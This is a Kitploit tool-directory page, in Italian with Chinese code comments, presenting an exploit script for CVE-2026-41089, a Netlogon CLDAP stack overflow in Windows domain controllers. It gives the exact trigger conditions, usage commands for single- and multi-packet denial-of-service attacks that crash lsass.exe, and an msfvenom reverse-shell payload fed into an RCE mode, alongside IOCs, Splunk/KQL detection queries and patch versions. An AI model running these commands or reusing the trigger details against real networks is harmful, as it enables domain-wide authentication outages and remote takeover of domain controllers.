Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-41089 — CVE-2026-41089 è una vulnerabilità critica di esecuzione remota di codice nel servizio Windows Netlogon: un singolo pacchetto può far crashare lsass.exe, causando il riavvio del controller di dominio in circa 30-60 secondi. Durante questo periodo, tutta l'autenticazione di dominio per quel DC fallirà. | Kitploit
Strumenti/GitHubGitHub/hnytgl/cve-2026-41089
Analisi delle VulnerabilitàExploitPenetration TestingStrumento di Accesso RemotoBinary Exploitation
GitHubhnytgl/cve-2026-41089

CVE-2026-41089

Vedi Repository
1412142 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

CVE-2026-41089 è una vulnerabilità critica di esecuzione remota di codice nel servizio Windows Netlogon: un singolo pacchetto può far crashare lsass.exe, causando il riavvio del controller di dominio in circa 30-60 secondi. Durante questo periodo, tutta l'autenticazione di dominio per quel DC fallirà.

Condividi

CVE-2026-41089 — Windows Netlogon CLDAP Stack Buffer Overflow RCE Exploit

CVE-ID: CVE-2026-41089
CVSS: 9.8 (Critical)
CWE: CWE-121 (Stack-based Buffer Overflow)
Vettore di attacco: UDP/389 (CLDAP SearchRequest)
Impatto: esecuzione remota di codice (RCE) / denial of service (DoS)
Versioni interessate: Windows Server 2012 R2 ~ 2025 (Domain Controllers)
Patch: aggiornamento cumulativo di maggio 2026

Panoramica della vulnerabilità

La funzione NetpLogonPutUnicodeString in netlogon.dll presenta una vulnerabilità di stack buffer overflow durante l'elaborazione delle richieste di ricerca CLDAP. La funzione riceve un budget di lunghezza in byte, ma lo interpreta come conteggio WCHAR, determinando una scrittura 2 volte superiore a quella prevista.

L'overflow si verifica nel buffer di stack fisso di 528 byte (264 ushort) della funzione NlGetLocalPingResponse. Il campo User controllabile dall'attaccante, insieme al nome di dominio DNS del server stesso, riempie questo buffer e finisce per sovrascrivere il cookie di sicurezza GS, causando e il crash di .

__report_gsfailure
lsass.exe

Condizioni di attivazione

  • NtVer=0x02 nella CLDAP SearchRequest (obbliga l'uso del vecchio percorso vulnerabile BuildSamLogonResponse)
  • Lunghezza del campo User ≥ ~130 caratteri (limite binario di circa 260 byte UTF-16)
  • Lunghezza del nome di dominio DNS del server ≥ ~80 caratteri (più lungo è il dominio, più facile è raggiungere il cookie)

Nota: NtVer=0x16 (il valore usato da molti script di rilevamento pubblici) attiva il percorso sicuro BuildSamLogonResponseEx e non attiva la vulnerabilità.

Funzionalità

ModalitàDescrizione
--mode dosInvia pacchetti CLDAP appositamente costruiti, causando il crash di LSASS e il riavvio del DC (~60 secondi di interruzione dell'autenticazione)
--mode rceTenta l'esecuzione remota di codice (livello di ricerca, richiede shellcode)
--mode scanScansiona le risposte per diversi valori NtVer ed esegue il fingerprinting del DC di destinazione
--mode autoRileva automaticamente e seleziona la migliore strategia di attacco

Modalità DoS

Un singolo pacchetto può mandare in crash lsass.exe, causando il riavvio del domain controller in circa 30-60 secondi. Durante questo periodo, tutta l'autenticazione di dominio su quel DC fallirà.

root@kitploit:~
# 基本用法 — 发送 3 个包
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode dos

# 单包快速攻击
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 1

# 激进模式 — 5 个包并发
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 5 --delay 0.1

Modalità RCE

⚠️ Livello di ricerca — inaffidabile e instabile in ambienti reali.

L'RCE deve affrontare le seguenti sfide:

  1. I dati dell'overflow sono il nome DNS del server stesso, non lo shellcode dell'attaccante
  2. Il cookie GS deve essere aggirato (richiede una primitiva di information leak o un brute force)
  3. CET/ACG/CFG su Server 2022+ rendono più difficile il ROP tradizionale
root@kitploit:~
# 生成 shellcode
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 \
         -f raw -o shellcode.bin

# 发送 RCE 链路
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode rce \
    --shellcode-file shellcode.bin --lhost 10.0.0.5 --lport 4444

Modalità di scansione

root@kitploit:~
# 对目标 DC 进行指纹识别
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode scan

Esempio di output previsto (target patchato):

root@kitploit:~
NtVer=0x00000002 → RESPONDED (3 ms)
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Esempio di output previsto (target non patchato):

root@kitploit:~
NtVer=0x00000002 → TIMEOUT (5001 ms)    ← LSASS crashed!
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Se NtVer=0x02 va in timeout mentre le altre versioni rispondono normalmente, il target è molto probabilmente vulnerabile.

Parametri avanzati

ParametroDescrizioneValore predefinito
-l, --user-lenLunghezza del campo username (numero di caratteri ASCII)180
--ntverValore NtVer (esadecimale, es. 0x02)0x02
--countNumero di pacchetti DoS da inviare3
--delayRitardo tra i pacchetti (secondi)0.5
-t, --timeoutTimeout del socket (secondi)5.0
--jsonOutput dei risultati in formato JSON—
--rawStampa l'esadecimale del pacchetto grezzo prima dell'invio—
--quietSopprime l'output del banner—
--shellcode-fileFile shellcode personalizzato (x64 grezzo)—
--lhostIndirizzo di ascolto della reverse shell—
--lportPorta di ascolto della reverse shell4444

Configurazione dell'ambiente di test

root@kitploit:~
# 在 Windows Server(未修补)上创建长域名 DC:
# 1. 提升为域控 (DNS 域名很长的域名,例如 "this-is-a-very-long-domain-name-for-testing.corp.local")
# 2. 确认已安装 2026 年 5 月之前的补丁
# 3. 从攻击机运行:
python CVE-2026-41089-exp.py <DC_IP> <LONG_DOMAIN_NAME> --mode dos --count 1
# 4. 观察 DC 崩溃和重启

Indicatori di compromissione (IOC)

Rete

  • CLDAP SearchRequest su UDP/389 con User > 100 byte e NtVer = 0x02
  • Traffico CLDAP anomalo verso il DC proveniente da host che non sono domain controller

Host

root@kitploit:~
Event ID: 1000
Faulting process: lsass.exe
Faulting module: netlogon.dll
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)

Regole di rilevamento

root@kitploit:~
index=wineventlog source="WinEventLog:Application" EventID=1000
  Process_Name="lsass.exe" Exception_Code="0xc0000409"
root@kitploit:~
Event
| where Source == "Application" and EventID == 1000
| where RenderedDescription contains "lsass.exe"
| where RenderedDescription contains "0xc0000409"

Informazioni sulla patch

Versione di Windows ServerNumero di versione della patchNote
Server 20126.2.9200.26079ESU
Server 2012 R26.3.9600.23181ESU
Server 201610.0.14393.9140
Server 201910.0.17763.8755
Server 202210.0.20348.5074
Server 2022 23H210.0.25398.2330
Server 202510.0.26100.32772

Avvertenze legali

Questo strumento è destinato esclusivamente a valutazioni di sicurezza autorizzate, test di penetrazione, competizioni CTF e ricerca difensiva. L'uso di questo strumento su qualsiasi sistema senza esplicita autorizzazione scritta è illegale. L'utente si assume ogni responsabilità legale.

Collegamenti di riferimento

  • Microsoft Security Update Guide: CVE-2026-41089
  • NVD: CVE-2026-41089
  • Kudelski Security Research — Netlogon Stack Buffer Overflow Analysis
  • SecPod Analysis — IOCs and Detection
  • IONIX Threat Center — CVE-2026-41089
Scarica lo strumento